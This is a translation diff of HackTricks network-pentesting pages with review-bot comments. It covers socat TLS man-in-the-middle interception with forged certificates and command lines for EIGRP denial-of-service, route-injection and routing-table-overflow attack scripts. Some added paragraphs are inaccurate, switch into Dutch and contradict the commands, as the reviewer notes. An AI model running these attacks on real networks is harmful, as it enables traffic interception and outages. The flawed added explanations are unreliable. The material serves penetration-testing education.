@@ -831,31 +853,56 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt # Generate the PEM file by just appending the key and certificate files: cat $FILENAME.key $FILENAME.crt >$FILENAME.pem ``` +#### Luister met behulp van sertifikaat -#### Listen using certificate +Om vertrouwelijke communicatie te onderscheppen, kan je een techniek gebruiken die bekend staat als "luisteren met behulp van een certificaat". Deze techniek maakt gebruik van een vervalst certificaat om de communicatie tussen een client en een server te onderscheppen. +Hier is een algemeen overzicht van hoe deze techniek werkt: + +1. Identificeer de doelserver waarvan je de communicatie wilt onderscheppen. +2. Genereer een vervalst certificaat dat overeenkomt met het domein van de doelserver. +3. Installeer het vervalste certificaat op je eigen systeem. +4. Configureer een proxyserver om de communicatie tussen de client en de server door te sturen. +5. Wanneer de client verbinding maakt met de server, zal de proxyserver het vervalste certificaat presenteren in plaats van het echte certificaat van de server. +6. De client zal het vervalste certificaat accepteren en de communicatie zal worden doorgestuurd naar de proxyserver. +7. De proxyserver kan de communicatie onderscheppen en de gegevens inzien voordat ze naar de server worden doorgestuurd. +8. Je kunt verschillende tools gebruiken om de communicatie te ontcijferen en de gegevens te analyseren. + +Het is belangrijk op te merken dat deze techniek alleen werkt als de client geen strikte certificaatvalidatie uitvoert. In sommige gevallen kan het nodig zijn om extra maatregelen te nemen, zoals het omzeilen van certificaatpinnen of het uitvoeren van een man-in-the-middle-aanval. + +Het is ook belangrijk om te benadrukken dat het gebruik van deze techniek zonder toestemming illegaal is en ernstige juridische gevolgen kan hebben. 
Het is alleen bedoeld voor educatieve doeleinden en voor gebruik door geautoriseerde beveiligingsprofessionals tijdens penetratietesten. ``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - ``` +#### Luister met behulp van sertifikaat en stuur de data deur na die gasheer -#### Listen using certificate and redirect to the hosts +Om netwerkverkeer af te luister en te onderskep, kan jy 'n sertifikaat gebruik om die data te versleutel en te dekodeer. Hier is 'n stap-vir-stap handleiding oor hoe om hierdie tegniek te implementeer: +1. Genereer 'n selfondertekende sertifikaat wat gebruik kan word om die verkeer te versleutel. Jy kan hulpmiddels soos OpenSSL gebruik om hierdie sertifikaat te skep. + +2. Installeer die sertifikaat op die toestel waarop jy die verkeer wil onderskep. Dit kan 'n bediener, 'n proxy of 'n ander toestel wees wat as 'n tussenganger dien. + +3. Stel die toestel so in dat dit die verkeer na die gewenste gasheer omlei. Dit kan gedoen word deur die netwerkinstellings te wysig of deur 'n spesifieke proxy te gebruik. + +4. Wanneer die verkeer deur die toestel vloei, sal die sertifikaat gebruik word om die data te versleutel. Dit verseker dat jy die verkeer kan onderskep sonder dat die eindgebruiker daarvan bewus is. + +5. Die onderskepte verkeer kan dan ontsleutel en geanaliseer word om inligting te verkry wat nuttig kan wees vir verdere pentesting of navorsing. + +Dit is belangrik om te onthou dat hierdie tegniek slegs gebruik moet word met toestemming van die eienaar van die netwerk of die toestelle wat onderskep word. Misbruik van hierdie tegniek kan wettige gevolge hê. 
``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 ``` +Soms, as die kliënt nagaan dat die CA geldig is, kan jy **'n sertifikaat van 'n ander gasheernaam wat deur 'n CA onderteken is, bedien**.\ +'n Ander interessante toets is om 'n **self-ondertekende sertifikaat van die gevraagde gasheernaam te bedien**. -Some times, if the client checks that the CA is a valid one, you could **serve a certificate of other hostname signed by a CA**.\ -Another interesting test, is to serve a c**ertificate of the requested hostname but self-signed**. - -Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this. +Ander dinge om te toets is om die sertifikaat te onderteken met 'n geldige sertifikaat wat nie 'n geldige CA is nie. Of om die geldige openbare sleutel te gebruik, dwing om 'n algoritme soos Diffie-Hellman te gebruik (een wat nie nodig het om enigiets met die regte privaatsleutel te ontsluit nie) en wanneer die kliënt 'n sonde van die regte privaatsleutel aanvra (soos 'n hasie), stuur 'n vals sonde en verwag dat die kliënt dit nie nagaan nie. ## Bettercap - ```bash # Events events.stream off #Stop showing events events.show #Show all events -events.show 5 #Show latests 5 events +events.show 5 #Show latests 5 events events.clear # Ticker (loop of commands) 
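Review bot: the two explanatory blocks added under `#### Luister met behulp van sertifikaat` and `#### Luister met behulp van sertifikaat en stuur die data deur na die gasheer` have no counterpart in the removed English lines (the original had only the headings and the `socat` commands), and the first one is Dutch, not Afrikaans ("Om vertrouwelijke communicatie te onderscheppen", "Het is belangrijk op te merken", "Het is alleen bedoeld voor educatieve doeleinden"). Both also misdescribe the commands: the second block says the certificate is used to "versleutel" the traffic so the end user is unaware, whereas `openssl-listen:443,...,verify=0 openssl-connect:[SERVER]:[PORT],verify=0` terminates TLS with the self-signed `$FILENAME.pem` and re-encrypts to the upstream without checking either side, and the first block's step 6 ("De client zal het vervalste certificaat accepteren") contradicts the paragraph that follows in the same hunk, which makes clear that acceptance depends on whether the client validates the CA. Suggest dropping the added paragraphs and keeping only heading plus command, as in the source. Smaller points in the same hunk: "zelfondertekend" is Dutch spelling (the hunk itself uses "selfondertekende" a few lines later); and "'n sonde van die regte privaatsleutel aanvra (soos 'n hasie)" renders "probe"/"hash" as a medical probe and a bunny, it should read something like "'n bewys van besit van die regte privaatsleutel aanvra (soos 'n hash)".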
@@ -876,20 +923,19 @@ set wifi.ap.channel 5 set wifi.ap.encryption false #If true, WPA2 wifi.recon on; wifi.ap ``` +### Aktiewe Ontdekkingsnotas -### Active Discovery Notes +Neem in ag dat wanneer 'n UDP-pakket na 'n toestel gestuur word wat nie oor die gevraagde poort beskik nie, 'n ICMP (Port Unreachable) gestuur word. -Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent. +### **ARP-ontdekking** -### **ARP discover** - -ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond. +ARP-pakette word gebruik om te bepaal watter IP-adresse binne die netwerk gebruik word. Die rekenaar moet 'n versoek vir elke moontlike IP-adres stuur en slegs diegene wat gebruik word, sal reageer. ### **mDNS (multicast DNS)** -Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services". +Bettercap stuur 'n mDNS-versoek (elke X ms) en vra vir **\_services\_.dns-sd.\_udp.local**. Die masjien wat hierdie pakkie sien, antwoord gewoonlik op hierdie versoek. Dan soek dit slegs na masjiene wat antwoord op "dienste". -**Tools** +**Hulpmiddels** * Avahi-browser (--all) * Bettercap (net.probe.mdns) 
@@ -897,17 +943,17 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp ### **NBNS (NetBios Name Server)** -Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". +Bettercap stuur uitsaai-pakette na poort 137/UDP en vra vir die naam "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". ### **SSDP (Simple Service Discovery Protocol)** -Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900). +Bettercap stuur SSDP-pakette uit wat soek na allerhande dienste (UDP-poort 1900). ### **WSD (Web Service Discovery)** -Bettercap broadcast WSD packets searching for services (UDP Port 3702). +Bettercap stuur WSD-pakette uit wat soek na dienste (UDP-poort 3702). -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) * **Network Security Assessment: Know Your Network (3rd edition)** @@ -915,20 +961,20 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). * [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
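Review bot: in the mDNS paragraph the translation "Dan soek dit slegs na masjiene wat antwoord op 'dienste'" turns the query name into a generic word; the original "services" refers to the literal label in `_services._dns-sd._udp.local`, so it should stay as `"services"` (untranslated, in code or quotes) or the sentence loses the thing Bettercap actually matches on. Also, the `events.show 5` line in the earlier hunk is a whitespace-only change and can be reverted to keep the diff to translation changes.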
diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index f7ba7a4af..88128222a 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### DHCPv6 vs. DHCPv4 Message Types Comparison -A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below: +### Vergelyking van DHCPv6- en DHCPv4-boodskaptipes +'n Vergelykende siening van DHCPv6- en DHCPv4-boodskaptipes word in die tabel hieronder voorgestel: -| DHCPv6 Message Type | DHCPv4 Message Type | +| DHCPv6-boodskaptipe | DHCPv4-boodskaptipe | |:-------------------|:-------------------| | Solicit (1) | DHCPDISCOVER | | Advertise (2) | DHCPOFFER | 
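Review bot: the translated support block here ("Deel jou hacking-truuks ... GitHub-opslagplekke", "HackTricks aflaai in PDF-formaat") differs from the version written into the previous file in this same patch ("Deel jou haktruuks ... github-opslag", "HackTricks in PDF wil aflaai"). Since this block is repeated verbatim at the top and bottom of every page, pick one rendering and apply it to every occurrence so the boilerplate stays identical across files.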
@@ -26,42 +24,40 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table | Release (8) | DHCPRELEASE | | Information-Request (11) | DHCPINFORM | | Decline (9) | DHCPDECLINE | -| Confirm (4) | none | +| Confirm (4) | geen | | Reconfigure (10) | DHCPFORCERENEW | -| Relay-Forw (12), Relay-Reply (13) | none | +| Relay-Forw (12), Relay-Reply (13) | geen | -**Detailed Explanation of DHCPv6 Message Types:** +**Gedetailleerde verduideliking van DHCPv6-boodskaptipes:** -1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers. -2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service. -3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server. -4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change. -5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations. -6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew. -7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline. -8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses. -9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network. -10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations. -11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment. -12. **Relay-Forw (12)**: Relay agents forward messages to servers. -13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client. +1. **Solicit (1)**: Geïnisieer deur 'n DHCPv6-kliënt om beskikbare bedieners te vind. +2. 
**Advertise (2)**: Deur bedieners gestuur as reaksie op 'n Solicit, wat beskikbaarheid vir DHCP-diens aandui. +3. **Request (3)**: Kliënte gebruik dit om IP-adresse of voorvoegsels van 'n spesifieke bediener aan te vra. +4. **Confirm (4)**: Gebruik deur 'n kliënt om te verifieer of die toegewysde adresse nog geldig is op die netwerk, tipies na 'n netwerkverandering. +5. **Renew (5)**: Kliënte stuur dit na die oorspronklike bediener om adreslewentye te verleng of konfigurasies op te dateer. +6. **Rebind (6)**: Gestuur na enige bediener om adreslewentye te verleng of konfigurasies op te dateer, veral wanneer geen reaksie ontvang word op 'n Renew nie. +7. **Reply (7)**: Bedieners gebruik dit om adresse, konfigurasieparameters te voorsien, of om boodskappe soos Release of Decline te erken. +8. **Release (8)**: Kliënte stel die bediener in kennis om een of meer toegewysde adresse te stop gebruik. +9. **Decline (9)**: Gestuur deur kliënte om te rapporteer dat toegewysde adresse in konflik is op die netwerk. +10. **Reconfigure (10)**: Bedieners moedig kliënte aan om transaksies vir nuwe of opgedateerde konfigurasies te begin. +11. **Information-Request (11)**: Kliënte vra konfigurasieparameters sonder IP-adres toewysing. +12. **Relay-Forw (12)**: Relay-agente stuur boodskappe na bedieners. +13. **Relay-Repl (13)**: Bedieners antwoord op relay-agente, wat dan die boodskap aan die kliënt aflewer. -## References +## Verwysings * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
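Review bot: item 8 of the message-type list is ungrammatical: "Kliënte stel die bediener in kennis om een of meer toegewysde adresse te stop gebruik". Suggest "Kliënte stel die bediener in kennis dat hulle die gebruik van een of meer toegewysde adresse staak." Item 10 renders "Servers prompt clients" as "Bedieners moedig kliënte aan" (encourage); Reconfigure is a server-initiated instruction, so "Bedieners laat kliënte ... begin" or "versoek kliënte om" is closer. The inconsistent support block at the end of the hunk has the same issue as noted on the header block.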
- - diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 147f83f08..fecb6aad5 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,86 +1,86 @@ -# EIGRP Attacks +# EIGRP Aanvalle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information. +**Hierdie is 'n opsomming van die aanvalle wat blootgestel word in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Kyk daar vir verdere inligting. -## **Fake EIGRP Neighbors Attack** - -- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. -- **Tool**: **helloflooding.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 - %%% +## **Valse EIGRP Buurnavorsingsaanval** + +- **Doelwit**: Om roeterverwerkers te oorlaai deur hulle te oorstroom met EIGRP-hallo-pakette, wat moontlik kan lei tot 'n Denial of Service (DoS)-aanval. +- **Instrument**: **helloflooding.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 +%%% - **Parameters**: - - `--interface`: Specifies the network interface, e.g., `eth0`. - - `--as`: Defines the EIGRP autonomous system number, e.g., `1`. - - `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`. +- `--interface`: Spesifiseer die netwerkinterface, bv. `eth0`. +- `--as`: Definieer die EIGRP outonome stelselnommer, bv. `1`. +- `--subnet`: Stel die subnetligging in, bv. `10.10.100.0/24`. -## **EIGRP Blackhole Attack** +## **EIGRP Swartgate-aanval** -- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. -- **Tool**: **routeinject.py** script. 
-- **Execution**: - %%%bash - ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 - %%% +- **Doelwit**: Om netwerkverkeersvloei te ontwrig deur 'n valse roete in te spuit, wat lei tot 'n swartgate waar die verkeer na 'n nie-bestaande bestemming gerig word. +- **Instrument**: **routeinject.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 +%%% - **Parameters**: - - `--interface`: Specifies the attacker’s system interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. - - `--dst`: Sets the target subnet IP. - - `--prefix`: Defines the mask of the target subnet IP. +- `--interface`: Spesifiseer die aanvaller se stelselkoppelvlak. +- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die aanvaller se IP-adres in. +- `--dst`: Stel die teikensubnet-IP in. +- `--prefix`: Definieer die masker van die teikensubnet-IP. -## **Abusing K-Values Attack** +## **Misbruik van K-Waardes-aanval** -- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. -- **Tool**: **relationshipnightmare.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 - %%% +- **Doelwit**: Om voortdurende ontwrigting en herverbindings binne die EIGRP-domein te skep deur gewysigde K-waardes in te spuit, wat effektief lei tot 'n DoS-aanval. +- **Instrument**: **relationshipnightmare.py**-skrips. +- **Uitvoering**: +%%%bash +~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 +%%% - **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the IP Address of a legitimate router. +- `--interface`: Spesifiseer die netwerkinterface. 
+- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die IP-adres van 'n geldige roeterverwerker in. -## **Routing Table Overflow Attack** +## **Roetertabel-oorloopaanval** -- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. -- **Tool**: **routingtableoverflow.py** script. -- **Execution**: - %%%bash - sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - %%% +- **Doelwit**: Om die roeterverwerker se CPU en RAM te belas deur die roetertabel met talle valse roetes te oorstroom. +- **Instrument**: **routingtableoverflow.py**-skrips. +- **Uitvoering**: +%%%bash +sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 +%%% - **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. +- `--interface`: Spesifiseer die netwerkinterface. +- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die aanvaller se IP-adres in.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
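Review bot: the list structure under each attack was flattened: the original indents the `%%%bash` fence and the parameter sub-bullets under the `- **Execution**` / `- **Parameters**` items (`  %%%bash`, `  - \`--interface\``), while the `+` lines dedent them to column 0, so in rendered markdown the parameters become top-level bullets and the fence breaks out of the list. Please keep the two-space indentation. Terminology in the same hunk: "Valse EIGRP Buurnavorsingsaanval" translates "Neighbors" as "buurnavorsing" (neighbour research); "Valse EIGRP-buuraanval" or "Vals EIGRP-bure-aanval" is meant. "roeterverwerkers" is used for "router CPUs" in the first attack but also for "a legitimate router" under `--src` of the K-values attack ("die IP-adres van 'n geldige roeterverwerker"), where the value is a router's IP, not a CPU; use "roeter" there, and "roeteringstabel" rather than "Roetertabel" for "routing table". The `%%%` placeholder for the triple-backtick fence is present in both the `-` and `+` lines, so that is pre-existing and not introduced here.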
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index a9f7f8255..e88fd0277 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,63 +1,62 @@ -# GLBP & HSRP Attacks +# GLBP & HSRP Aanvalle
